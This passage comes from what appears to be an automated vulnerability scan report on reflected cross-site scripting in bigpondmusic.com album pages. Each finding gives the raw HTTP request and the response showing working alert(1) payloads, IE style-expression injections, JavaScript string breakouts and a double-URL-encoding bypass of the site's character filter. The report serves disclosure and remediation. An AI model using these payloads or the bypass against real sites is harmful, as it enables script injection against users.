Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134007


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Greatest Hits...So Fa
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/greatest-hits-so-far?2b739"style="x:expression(alert(1))"0516aff5a34=1" />
...[SNIP]...

2.115. http://bigpondmusic.com/album/p-nk/raise-your-glass [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b002'%3b2512425bfef was submitted in the REST URL parameter 1. This input was echoed as 7b002';2512425bfef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album7b002'%3b2512425bfef/p-nk/raise-your-glass HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album7b002';2512425bfef';
   s.prop4 = 'p-nk';
   s.prop5 = 'raise-your-glass';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '
...[SNIP]...

2.116. http://bigpondmusic.com/album/p-nk/raise-your-glass [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8 was submitted in the REST URL parameter 1. This input was echoed as 5901a"><script>alert(1)</script>d5cb7aa2bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8/p-nk/raise-your-glass HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88325


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album5901a"><script>alert(1)</script>d5cb7aa2bc8/p-nk/raise-your-glass" />
...[SNIP]...

2.117. http://bigpondmusic.com/album/p-nk/raise-your-glass [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 was submitted in the h parameter. This input was echoed as f36a9"style="x:expression(alert(1))"6ca781435e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/raise-your-glass?h=756314040f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105147


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Raise Your Glass - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?h=756314040f36a9"style="x:expression(alert(1))"6ca781435e0" />
...[SNIP]...

2.118. http://bigpondmusic.com/album/p-nk/raise-your-glass [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9c4d"style="x:expression(alert(1))"397b8c9825e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/raise-your-glass?b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:20:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Raise Your Glass - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?b9c4d"style="x:expression(alert(1))"397b8c9825e=1" />
...[SNIP]...

2.119. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3 was submitted in the REST URL parameter 1. This input was echoed as c0385"><script>alert(1)</script>3e0a93acac3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc0385"><script>alert(1)</script>3e0a93acac3/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2" />
...[SNIP]...

2.120. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4292b'%3b33844f2483 was submitted in the REST URL parameter 1. This input was echoed as 4292b';33844f2483 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4292b'%3b33844f2483/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88267


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4292b';33844f2483';
   s.prop4 = 'paul-kelly';
   s.prop5 = 'paul-kellys-greatest-hits-songs-from-the-south-volume-1-2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.h
...[SNIP]...

2.121. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 was submitted in the h parameter. This input was echoed as e427a"style="x:expression(alert(1))"fe0616ca712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Paul Kelly - Paul Kelly's Gr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style="x:expression(alert(1))"fe0616ca712" />
...[SNIP]...

2.122. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d82"style%3d"x%3aexpression(alert(1))"e1280da1058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60d82"style="x:expression(alert(1))"e1280da1058 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style%3d"x%3aexpression(alert(1))"e1280da1058=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154937


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Paul Kelly - Paul Kelly's Gr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style="x:expression(alert(1))"e1280da1058=1" />
...[SNIP]...

2.123. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f was submitted in the REST URL parameter 1. This input was echoed as fc80e"><script>alert(1)</script>52b1405e7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88042


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfc80e"><script>alert(1)</script>52b1405e7f/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000" />
...[SNIP]...

2.124. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa9c1'%3b630504def5d was submitted in the REST URL parameter 1. This input was echoed as aa9c1';630504def5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumaa9c1'%3b630504def5d/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumaa9c1';630504def5d';
   s.prop4 = 'powderfinger';
   s.prop5 = 'fingerprints-the-best-of-powderfinger-1994-2000';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.
...[SNIP]...

2.125. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a6a7"style="x:expression(alert(1))"e1cd885fe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000?8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 130253


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Powderfinger - Fingerprints
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000?8a6a7"style="x:expression(alert(1))"e1cd885fe90=1" />
...[SNIP]...

2.126. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

